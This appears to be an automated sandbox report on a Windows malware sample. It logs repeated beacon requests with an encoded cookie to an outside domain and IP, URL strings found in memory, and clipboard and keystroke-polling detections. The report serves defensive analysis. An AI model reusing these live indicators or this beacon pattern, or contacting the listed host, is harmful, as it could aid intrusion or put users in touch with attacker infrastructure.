Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: easthoolbook.com

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3218783983.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151112670.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3188931002.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245218172.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.00000000004A2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2092109726.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181153623.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3051105235.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/8j
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/Gs
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/Tj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/bq
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/ign.mpeg?dare=true
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2841533366.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/nr
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3291723868.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/o
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/r
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2396331476.000000000048A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true$j
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.00000000004E7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275111012.00000000004E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true%YE
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3291723868.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true.0h
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true:d
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3129143309.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueGs
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2901567104.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueHj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueL
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueLj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueNx
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueProvider
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2901567104.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueProviderLj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueTj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truebd8
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.0000000000459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truedll
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truephic
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truesrP
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truet
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.00000000004E8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.00000000004E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truezY
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/v

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49748 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_0000000140145214 SrcHashImpl::SrcHashImpl,CreateCompatibleDC,CreateCompatibleBitmap,FillRect,OpenClipboard,EmptyClipboard,CloseClipboard,SetClipboardData,CloseClipboard,

0_2_0000000140145214

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_0000000140158178 GetAsyncKeyState,

0_2_0000000140158178

Potential key logger detected (key state polling based)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400B4288 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageW,ScreenToClient,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,GetParent,		0_2_00000001400B4288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013D824 GetKeyState,GetKeyState,GetKeyState,		0_2_000000014013D824

System Summary

Malicious sample detected (through community Yara rule)

